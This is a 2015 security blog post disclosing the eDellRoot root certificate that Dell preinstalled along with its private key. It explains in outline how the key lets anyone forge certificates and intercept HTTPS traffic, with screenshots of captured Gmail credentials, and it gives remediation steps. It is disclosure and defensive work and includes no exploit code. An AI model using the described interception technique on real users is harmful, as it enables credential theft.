Published on November 24, 2015

Abusing Dell Rogue Root CA to Steal User Data

Abusing Dell Rogue Root CA to Steal User Data

Dell has been shipping laptops with a rogue Root CA pre-installed, similarly to what happened earlier this year with SuperFish installed on Lenovo laptops. We will show how it is possible to abuse the root CA to steal user’s data and how to safely remove it.

Root CA

If you own a Dell Laptop, just click on the Windows Start menu and type: certmgr.msc, navigate on the left panel to Trusted Root Certification Authorities and look for the presence of a certificate entry called eDellRoot.
Dell root CA
As you can see from the image there is a small key icon, that means the certificate includes a private key. A certificate with a private key is as bad as one without, with a difference: when the private key is provided, everybody can take advantage of the certificate in order to create additional certificates that are recognized as valid by the operating system in use. Let’s see in practical terms what that means.

Abusing Dell Root CA

Once you have your own root Certification Authority you can generate and sign any number of certificates: SSL, code signing, S/MIME etc… If your CA is installed on millions of devices then you’ve got quite some power. If you leave the private key embedded in the CA certificate then everybody suddenly has a lot of power. Just imagine what would happen if someone were to create a certificate for, say, *.google.com. This someone might intercept your SSL traffic, decrypt and inspect it without leaving a trace. Well, we don’t really have to imagine it, let’s do it: we just have to use openssl to create a certificate for the domain/s we would like to hijack and sign them with the CA’s private key, the rest of the job is carried on by a proxy that takes care of automatically generating the right certificates on the fly, while encrypting and decrypting traffic as required. The end result would be something like this, notice the “This website has been verified by eDellRoot” instead of what it should really be: “Google Internet Authority”:
Dell Hijacking GMail
Google Chrome and Internet Explorer will not notice anything unusual since the certificate is valid and signed by a Trusted CA. Google Chrome uses certificate pinning to avoid external MITM (man-in-the-middle) attacks although user’s installed certificate authorities have the authority to override pins, thus allowing MITM, like in this case.
Dell Google Certificate
Firefox on the other hand will not be fooled since Mozilla uses its own certificate store, so despite the certificate being formally valid, it will not be accepted by Firefox. Apparently Dell’s helper utility is not installing the root CA into the Mozilla Certificate Store.
Abusing Dell Root CA - Firefox
At this point it becomes easy to peer into the encrypted SSL traffic as if it was plain HTTP, thus stealing access credentials or retrieving the user’s private data. What you see below is a screenshot of GMail access credentials obtained via proxy-based MITM that appears to be completely invisible to the local browser. Every Dell computer equipped with the rogue root CA is vulnerable to this issue.
Dell Gmail Credentials

Remediation

In order to check whether you’re affected or not simply visit this website, it will tell right away if the Dell rogue root CA is installed on your system. Removing it manually won’t help, in fact Dell Foundation Service will keep reinstalling it. To address this issue Dell released an update and a statement.

Conclusions

Obviously every Root CA has the same capabilities and the same impact as just seen, that’s why keeping your system (may it be a desktop or a mobile device) clear of rogue CAs is important, though not easy at the same time. When manufacturers make the mistake of releasing also the private keys they empower random people to create wild certificates accepted by the manufacturer’s devices. Root CAs should be installed only when strictly required, of course we’re not assuming that Dell used it for evil purposes, in fact they stated it was used for support purposes, but the consequences can still be severe.
Join our newsletter to get the world’s latest security events and our technical analyses delivered directly to your inbox!
ReaQta

Share:
Categories: